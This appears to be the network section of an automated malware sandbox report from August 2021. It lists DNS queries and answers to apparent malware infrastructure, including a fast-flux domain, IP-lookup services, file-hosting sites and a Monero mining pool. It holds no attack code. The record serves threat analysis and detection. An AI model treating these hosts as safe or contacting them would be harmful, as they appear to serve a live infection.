Aug 23, 2021 02:09:08.865863085 CEST	49361	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:08.890104055 CEST	53	49361	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:10.493438959 CEST	63150	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:10.517839909 CEST	53	63150	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:11.696312904 CEST	53279	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:11.728424072 CEST	53	53279	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:13.653059006 CEST	56881	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:13.678126097 CEST	53	56881	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:15.878994942 CEST	53642	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:15.906353951 CEST	53	53642	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:17.428281069 CEST	55667	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:17.455415010 CEST	53	55667	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:17.566154957 CEST	54833	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:17.598347902 CEST	53	54833	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:18.680464029 CEST	62476	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:18.705981970 CEST	53	62476	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:20.789274931 CEST	49705	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:20.824301004 CEST	53	49705	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:20.843740940 CEST	61477	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:20.875869036 CEST	53	61477	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:30.234862089 CEST	61633	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:30.267977953 CEST	53	61633	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:30.534287930 CEST	55949	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:30.577874899 CEST	53	55949	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:31.362869978 CEST	57601	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:31.395144939 CEST	53	57601	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:33.659673929 CEST	49342	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:33.694899082 CEST	53	49342	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:33.702630997 CEST	56253	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:33.738157034 CEST	53	56253	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:35.340652943 CEST	49667	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:35.375576019 CEST	53	49667	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:59.230534077 CEST	55439	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:59.265465021 CEST	53	55439	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:59.275398970 CEST	57069	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:59.300663948 CEST	53	57069	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Aug 23, 2021 02:07:55.748246908 CEST	192.168.2.3	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Aug 23, 2021 02:07:56.638663054 CEST	192.168.2.3	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 23, 2021 02:07:01.161201954 CEST	192.168.2.3	8.8.8.8	0x3ff7	Standard query (0)	clientconfig.passport.net	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:50.490118027 CEST	192.168.2.3	8.8.8.8	0xd9ff	Standard query (0)	aucmoney.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:50.570710897 CEST	192.168.2.3	8.8.8.8	0x756e	Standard query (0)	thegymmum.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:51.579727888 CEST	192.168.2.3	8.8.8.8	0x756e	Standard query (0)	thegymmum.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:52.595510960 CEST	192.168.2.3	8.8.8.8	0x756e	Standard query (0)	thegymmum.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:54.634759903 CEST	192.168.2.3	8.8.8.8	0x154b	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:56.036282063 CEST	192.168.2.3	8.8.8.8	0x62b0	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:57.367733955 CEST	192.168.2.3	8.8.8.8	0xc3e6	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:58.507656097 CEST	192.168.2.3	8.8.8.8	0xd20b	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:00.802826881 CEST	192.168.2.3	8.8.8.8	0x6b81	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:03.184628010 CEST	192.168.2.3	8.8.8.8	0x11e1	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:07.648027897 CEST	192.168.2.3	8.8.8.8	0xd94e	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:09.244616985 CEST	192.168.2.3	8.8.8.8	0xaa52	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:10.816901922 CEST	192.168.2.3	8.8.8.8	0xbba7	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:33.274183035 CEST	192.168.2.3	8.8.8.8	0x7704	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:34.470122099 CEST	192.168.2.3	8.8.8.8	0xf0fd	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:35.967782974 CEST	192.168.2.3	8.8.8.8	0xcd60	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:38.276667118 CEST	192.168.2.3	8.8.8.8	0x6284	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:39.514575005 CEST	192.168.2.3	8.8.8.8	0x369a	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:41.933979034 CEST	192.168.2.3	8.8.8.8	0x3630	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:43.130424023 CEST	192.168.2.3	8.8.8.8	0xb60b	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:44.702106953 CEST	192.168.2.3	8.8.8.8	0xb56f	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:47.390358925 CEST	192.168.2.3	8.8.8.8	0xd2be	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:48.911514997 CEST	192.168.2.3	8.8.8.8	0xe945	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:50.402153015 CEST	192.168.2.3	8.8.8.8	0x1e99	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:51.989214897 CEST	192.168.2.3	8.8.8.8	0x4aca	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:53.649127007 CEST	192.168.2.3	8.8.8.8	0xa006	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:55.222528934 CEST	192.168.2.3	8.8.8.8	0xb692	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.538966894 CEST	192.168.2.3	8.8.8.8	0xdb3b	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.709592104 CEST	192.168.2.3	8.8.8.8	0x3dd0	Standard query (0)	trustmanager.ug	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.902708054 CEST	192.168.2.3	8.8.8.8	0xf8f5	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:58.808264971 CEST	192.168.2.3	8.8.8.8	0xe9b6	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:00.404898882 CEST	192.168.2.3	8.8.8.8	0xf82b	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:01.956758976 CEST	192.168.2.3	8.8.8.8	0x237f	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:07.312016964 CEST	192.168.2.3	8.8.8.8	0x4ce7	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:08.865863085 CEST	192.168.2.3	8.8.8.8	0xd8a5	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:10.493438959 CEST	192.168.2.3	8.8.8.8	0x22fb	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:11.696312904 CEST	192.168.2.3	8.8.8.8	0x5129	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:13.653059006 CEST	192.168.2.3	8.8.8.8	0xb658	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:15.878994942 CEST	192.168.2.3	8.8.8.8	0xa8d7	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:17.428281069 CEST	192.168.2.3	8.8.8.8	0xc48	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:17.566154957 CEST	192.168.2.3	8.8.8.8	0x19e1	Standard query (0)	waskitaprecast.co.id	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:18.680464029 CEST	192.168.2.3	8.8.8.8	0x41e	Standard query (0)	atvcampingtrips.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:20.789274931 CEST	192.168.2.3	8.8.8.8	0xe556	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:20.843740940 CEST	192.168.2.3	8.8.8.8	0xf73d	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:30.234862089 CEST	192.168.2.3	8.8.8.8	0x270	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:30.534287930 CEST	192.168.2.3	8.8.8.8	0xb879	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:31.362869978 CEST	192.168.2.3	8.8.8.8	0xb954	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:33.659673929 CEST	192.168.2.3	8.8.8.8	0xaae8	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:33.702630997 CEST	192.168.2.3	8.8.8.8	0x2851	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:35.340652943 CEST	192.168.2.3	8.8.8.8	0x3c6a	Standard query (0)	xmr.2miners.com	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:59.230534077 CEST	192.168.2.3	8.8.8.8	0x91eb	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:59.275398970 CEST	192.168.2.3	8.8.8.8	0x7cf7	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 23, 2021 02:07:01.196121931 CEST	8.8.8.8	192.168.2.3	0x3ff7	No error (0)	clientconfig.passport.net	authgfx.msa.akadns6.net		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2021 02:07:01.348452091 CEST	8.8.8.8	192.168.2.3	0x7251	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2021 02:07:50.534657001 CEST	8.8.8.8	192.168.2.3	0xd9ff	Server failure (2)	aucmoney.com	none	none	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:54.619680882 CEST	8.8.8.8	192.168.2.3	0x756e	Server failure (2)	thegymmum.com	none	none	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:54.814737082 CEST	8.8.8.8	192.168.2.3	0x154b	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:54.814737082 CEST	8.8.8.8	192.168.2.3	0x154b	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:54.814737082 CEST	8.8.8.8	192.168.2.3	0x154b	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:54.814737082 CEST	8.8.8.8	192.168.2.3	0x154b	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:54.814737082 CEST	8.8.8.8	192.168.2.3	0x154b	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:54.814737082 CEST	8.8.8.8	192.168.2.3	0x154b	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:54.814737082 CEST	8.8.8.8	192.168.2.3	0x154b	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:54.814737082 CEST	8.8.8.8	192.168.2.3	0x154b	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:54.814737082 CEST	8.8.8.8	192.168.2.3	0x154b	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:54.814737082 CEST	8.8.8.8	192.168.2.3	0x154b	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:55.747823954 CEST	8.8.8.8	192.168.2.3	0x756e	Server failure (2)	thegymmum.com	none	none	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:56.071549892 CEST	8.8.8.8	192.168.2.3	0x62b0	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:56.071549892 CEST	8.8.8.8	192.168.2.3	0x62b0	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:56.071549892 CEST	8.8.8.8	192.168.2.3	0x62b0	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:56.071549892 CEST	8.8.8.8	192.168.2.3	0x62b0	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:56.071549892 CEST	8.8.8.8	192.168.2.3	0x62b0	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:56.071549892 CEST	8.8.8.8	192.168.2.3	0x62b0	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:56.071549892 CEST	8.8.8.8	192.168.2.3	0x62b0	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:56.071549892 CEST	8.8.8.8	192.168.2.3	0x62b0	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:56.071549892 CEST	8.8.8.8	192.168.2.3	0x62b0	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:56.071549892 CEST	8.8.8.8	192.168.2.3	0x62b0	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:56.638187885 CEST	8.8.8.8	192.168.2.3	0x756e	Server failure (2)	thegymmum.com	none	none	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:57.399835110 CEST	8.8.8.8	192.168.2.3	0xc3e6	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:57.399835110 CEST	8.8.8.8	192.168.2.3	0xc3e6	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:57.399835110 CEST	8.8.8.8	192.168.2.3	0xc3e6	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:57.399835110 CEST	8.8.8.8	192.168.2.3	0xc3e6	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:57.399835110 CEST	8.8.8.8	192.168.2.3	0xc3e6	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:57.399835110 CEST	8.8.8.8	192.168.2.3	0xc3e6	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:57.399835110 CEST	8.8.8.8	192.168.2.3	0xc3e6	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:57.399835110 CEST	8.8.8.8	192.168.2.3	0xc3e6	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:57.399835110 CEST	8.8.8.8	192.168.2.3	0xc3e6	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:57.399835110 CEST	8.8.8.8	192.168.2.3	0xc3e6	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:58.816405058 CEST	8.8.8.8	192.168.2.3	0xd20b	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:58.816405058 CEST	8.8.8.8	192.168.2.3	0xd20b	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:58.816405058 CEST	8.8.8.8	192.168.2.3	0xd20b	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:58.816405058 CEST	8.8.8.8	192.168.2.3	0xd20b	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:58.816405058 CEST	8.8.8.8	192.168.2.3	0xd20b	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:58.816405058 CEST	8.8.8.8	192.168.2.3	0xd20b	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:58.816405058 CEST	8.8.8.8	192.168.2.3	0xd20b	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:58.816405058 CEST	8.8.8.8	192.168.2.3	0xd20b	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:58.816405058 CEST	8.8.8.8	192.168.2.3	0xd20b	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:07:58.816405058 CEST	8.8.8.8	192.168.2.3	0xd20b	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:00.835565090 CEST	8.8.8.8	192.168.2.3	0x6b81	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:00.835565090 CEST	8.8.8.8	192.168.2.3	0x6b81	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:00.835565090 CEST	8.8.8.8	192.168.2.3	0x6b81	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:00.835565090 CEST	8.8.8.8	192.168.2.3	0x6b81	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:00.835565090 CEST	8.8.8.8	192.168.2.3	0x6b81	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:00.835565090 CEST	8.8.8.8	192.168.2.3	0x6b81	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:00.835565090 CEST	8.8.8.8	192.168.2.3	0x6b81	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:00.835565090 CEST	8.8.8.8	192.168.2.3	0x6b81	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:00.835565090 CEST	8.8.8.8	192.168.2.3	0x6b81	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:00.835565090 CEST	8.8.8.8	192.168.2.3	0x6b81	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:03.219505072 CEST	8.8.8.8	192.168.2.3	0x11e1	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:03.219505072 CEST	8.8.8.8	192.168.2.3	0x11e1	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:03.219505072 CEST	8.8.8.8	192.168.2.3	0x11e1	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:03.219505072 CEST	8.8.8.8	192.168.2.3	0x11e1	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:03.219505072 CEST	8.8.8.8	192.168.2.3	0x11e1	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:03.219505072 CEST	8.8.8.8	192.168.2.3	0x11e1	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:03.219505072 CEST	8.8.8.8	192.168.2.3	0x11e1	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:03.219505072 CEST	8.8.8.8	192.168.2.3	0x11e1	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:03.219505072 CEST	8.8.8.8	192.168.2.3	0x11e1	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:03.219505072 CEST	8.8.8.8	192.168.2.3	0x11e1	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:07.675353050 CEST	8.8.8.8	192.168.2.3	0xd94e	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:07.675353050 CEST	8.8.8.8	192.168.2.3	0xd94e	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:07.675353050 CEST	8.8.8.8	192.168.2.3	0xd94e	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:07.675353050 CEST	8.8.8.8	192.168.2.3	0xd94e	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:07.675353050 CEST	8.8.8.8	192.168.2.3	0xd94e	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:07.675353050 CEST	8.8.8.8	192.168.2.3	0xd94e	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:07.675353050 CEST	8.8.8.8	192.168.2.3	0xd94e	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:07.675353050 CEST	8.8.8.8	192.168.2.3	0xd94e	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:07.675353050 CEST	8.8.8.8	192.168.2.3	0xd94e	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:07.675353050 CEST	8.8.8.8	192.168.2.3	0xd94e	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:09.279850960 CEST	8.8.8.8	192.168.2.3	0xaa52	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:09.279850960 CEST	8.8.8.8	192.168.2.3	0xaa52	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:09.279850960 CEST	8.8.8.8	192.168.2.3	0xaa52	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:09.279850960 CEST	8.8.8.8	192.168.2.3	0xaa52	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:09.279850960 CEST	8.8.8.8	192.168.2.3	0xaa52	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:09.279850960 CEST	8.8.8.8	192.168.2.3	0xaa52	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:09.279850960 CEST	8.8.8.8	192.168.2.3	0xaa52	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:09.279850960 CEST	8.8.8.8	192.168.2.3	0xaa52	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:09.279850960 CEST	8.8.8.8	192.168.2.3	0xaa52	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:09.279850960 CEST	8.8.8.8	192.168.2.3	0xaa52	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:10.849088907 CEST	8.8.8.8	192.168.2.3	0xbba7	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:10.849088907 CEST	8.8.8.8	192.168.2.3	0xbba7	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:10.849088907 CEST	8.8.8.8	192.168.2.3	0xbba7	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:10.849088907 CEST	8.8.8.8	192.168.2.3	0xbba7	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:10.849088907 CEST	8.8.8.8	192.168.2.3	0xbba7	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:10.849088907 CEST	8.8.8.8	192.168.2.3	0xbba7	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:10.849088907 CEST	8.8.8.8	192.168.2.3	0xbba7	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:10.849088907 CEST	8.8.8.8	192.168.2.3	0xbba7	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:10.849088907 CEST	8.8.8.8	192.168.2.3	0xbba7	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:10.849088907 CEST	8.8.8.8	192.168.2.3	0xbba7	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:33.301907063 CEST	8.8.8.8	192.168.2.3	0x7704	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:33.301907063 CEST	8.8.8.8	192.168.2.3	0x7704	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:33.301907063 CEST	8.8.8.8	192.168.2.3	0x7704	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:33.301907063 CEST	8.8.8.8	192.168.2.3	0x7704	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:33.301907063 CEST	8.8.8.8	192.168.2.3	0x7704	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:33.301907063 CEST	8.8.8.8	192.168.2.3	0x7704	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
